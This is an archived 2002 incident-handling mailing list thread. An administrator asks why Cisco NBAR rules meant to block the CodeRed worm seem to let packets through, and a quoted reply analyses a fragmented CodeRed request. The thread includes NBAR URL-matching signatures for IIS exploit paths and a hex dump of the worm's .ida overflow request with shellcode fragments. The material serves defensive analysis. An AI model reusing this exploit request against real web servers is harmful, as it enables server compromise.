Are you using Cisco's NBAR to block CodeRed packets? We have two routers, one 3640 that brings in our two WAN circuits and a 7120 that NAT's and some other stuff to our Corporate network. I have the NBAR running on both with the following: class-map match-any http-hacks match protocol http url "*default.ida*" match protocol http url "*x.ida*" match protocol http url "*.ida*" match protocol http url "*cmd.exe*" match protocol http url "*root.exe*" match protocol http url "*.eml" as per Cisco's website. I shouldn't see any of the packets matching the CodeRed signatures getting through the first router. But I do. I see packets showing up in the log on the second router as well. So I am not sure if the solution that Cisco provided to us is actually working. I am seeing this in the logs: *Mar 22 23:19:47: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26764) -> (DEST IP)(80), 1 packet *Mar 22 23:19:52: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26764) -> (DEST IP)(80), 1 packet *Mar 22 23:19:57: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26764) -> (DEST IP)(80), 1 packet *Mar 22 23:20:19: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26764) -> (DEST IP)(80), 1 packet *Mar 22 23:20:26: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26843) -> (DEST IP)(80), 1 packet *Mar 22 23:20:30: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26843) -> (DEST IP)(80), 1 packet *Mar 22 23:20:36: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26843) -> (DEST IP)(80), 1 packet *Mar 22 23:21:53: %SEC-6-IPACCESSLOGP: list (ACCESS-LIST NAME) denied tcp (SOURCE IP)(26843) -> (DEST IP)(80), 1 packet -----Original Message----- From: Chris Russel [mailto:russelat_private] Sent: Thursday, January 10, 2002 10:19 AM To: incidentsat_private Subject: Re: new codered worm penetrates content-filtering For those who asked, here's a sample of the GET request packets. With normal codered (and any other web traffic) the GET would be in the same packet as the URL since there is no reason to fragment. Ironically, the Don't Fragment bit is set... 08:05:00.285196 a.b.c.d.3237 > w.x.y.z.80: P 1:5(4) ack 1 win 16384 (DF) payload: 0030 47 45 54 20 00 00 GE T .. 08:05:00.289638 a.b.c.d.3237 > w.x.y.z.80: P 5:513(508) ack 1 win 16384 (DF) payload: 0030 2f 64 65 66 61 75 6c 74 2e 69 /d efault.i 0040 64 61 3f 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e da?NNNNN NNNNNNNN 0050 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 0060 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 0070 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 0080 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 0090 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 00a0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 00b0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 00c0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 00d0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 00e0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 00f0 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 0100 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 0110 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNN NNNNNNNN 0120 4e 4e 4e 25 75 39 30 39 30 25 75 36 38 35 38 25 NNN%u909 0%u6858% 0130 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39 ucbd3%u7 801%u909 0140 30 25 75 36 38 35 38 25 75 63 62 64 33 25 75 37 0%u6858% ucbd3%u7 0150 38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25 801%u909 0%u6858% 0160 75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39 ucbd3%u7 801%u909 0170 30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30 0%u9090% u8190%u0 0180 30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25 0c3%u000 3%u8b00% 0190 75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37 u531b%u5 3ff%u007 01a0 38 25 75 30 30 30 30 25 75 30 30 3d 61 20 20 48 8%u0000% u00=a H 01b0 54 54 50 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 TTP/1.0. .Content 01c0 2d 74 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a -type: t ext/xml. 01d0 48 4f 53 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f HOST:www .worm.co 01e0 6d 0a 20 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43 m. Accep t: */*.C 01f0 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33 ontent-l ength: 3 0200 35 36 39 20 0d 0a 0d 0a 55 8b ec 81 ec 18 02 00 569 .... U....... 0210 00 53 56 57 8d bd e8 fd ff ff b9 86 00 00 00 b8 .SVW.... ........ 0220 cc cc cc cc f3 ab c7 85 70 fe ff ff 00 00 00 00 ........ p....... 0230 e9 0a .. -- Chris Russel | CNS Information Security russelat_private | York University, Toronto, Canada ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 14:33:09 PST